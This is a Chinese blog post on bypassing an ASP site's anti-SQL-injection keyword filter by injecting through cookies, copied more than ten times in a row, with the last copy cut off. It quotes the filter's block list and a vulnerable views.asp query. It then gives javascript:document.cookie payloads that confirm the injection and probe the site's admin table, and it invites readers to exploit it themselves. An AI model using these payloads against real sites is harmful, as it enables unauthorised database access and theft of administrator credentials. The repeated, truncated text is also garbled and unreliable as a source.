If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42106) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42105) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42104) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42103) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42102) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42101) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42100) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42099) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42098) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42097) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42096) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42095) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42094) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42093) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42092) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
